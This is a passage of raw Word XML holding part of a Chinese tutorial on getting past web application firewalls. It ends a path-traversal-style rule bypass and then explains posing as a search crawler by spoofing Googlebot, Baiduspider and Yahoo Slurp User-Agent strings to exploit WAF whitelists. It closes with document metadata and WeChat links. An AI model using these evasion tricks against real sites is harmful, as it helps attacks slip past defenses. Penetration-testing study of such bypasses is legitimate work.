        <w:t>=/manage/&amp;b=../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绕过防御规则。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方式四：爬虫白名单</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>有提供爬虫白名单的功能，识别爬虫的技术一般有两种：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>1、 根据</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UserAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  2、通过行为来判断</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UserAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>可以很容易欺骗，我们可以伪装成爬虫尝试绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>User Agent Switcher (Firefox 附加组件)，下载地址:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRPr="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:r>
        <w:t>https://addons.mozilla.org/en-US/firefox/addon/user-agent-switcher/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886"/>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常见的爬虫</w:t>
      </w:r>
      <w:r>
        <w:t>User-Agent：</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UserAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: "Mozilla/5.0 (compatible; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Googlebot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/2.1; +http://www.google.com/bot.html)" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UserAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Baiduspider</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">+(+http://www.baidu.com/search/spider.htm)" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E3886" w:rsidRPr="003E3886" w:rsidRDefault="003E3886" w:rsidP="003E3886">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UserAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>: "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003E3886" w:rsidRPr="003E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17"/>
    <w:rsid w:val="00024183"/>
    <w:rsid w:val="0003755F"/>
    <w:rsid w:val="003E3886"/>
    <w:rsid w:val="00666527"/>
    <w:rsid w:val="007D63FE"/>
    <w:rsid w:val="00A62817"/>
    <w:rsid w:val="00A7721D"/>
    <w:rsid w:val="00B12C36"/>
    <w:rsid w:val="00C355D5"/>
    <w:rsid w:val="00F7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E444"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CA84FD36-13F5-4038-B316-E154D744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3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zA3NzE2MjgwMg==&amp;mid=2448903997&amp;idx=1&amp;sn=b77179090e88e8be9e7eb81ee148202b&amp;chksm=8b55df60bc22567631c12e86450390a9e14cf50fc73e0cd19d17610b8ccc63fd761b25df9705&amp;scene=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A3NzE2MjgwMg==&amp;mid=2448903996&amp;idx=1&amp;sn=9e2a7f2bd659781d1cd244bcadb74f6b&amp;chksm=8b55df61bc2256774d09cbf4ac24ad83bb53fec33f69c6de2bebfe3dbfbdaed8599b9995b0d1&amp;scene=21" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mp.weixin.qq.com/s?__biz=MzA3NzE2MjgwMg==&amp;mid=2448903991&amp;idx=1&amp;sn=6bd5b6988dc0464f0a3170de6d5e3cae&amp;chksm=8b55df6abc22567ce93b042363a40f7c78775a95ce37232f5983c361993ef23b0f07ef2515b9&amp;scene=21" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://mp.weixin.qq.com/s?__biz=MzA3NzE2MjgwMg==&amp;mid=2448903977&amp;idx=1&amp;sn=008229fe76b96e4a229a3a4144fcb284&amp;chksm=8b55df74bc225662a50c05b4e7a1a911e177e3e276658571c0438bba803a69fff0e1748f4812&amp;scene=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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-15T01:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-15T11:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>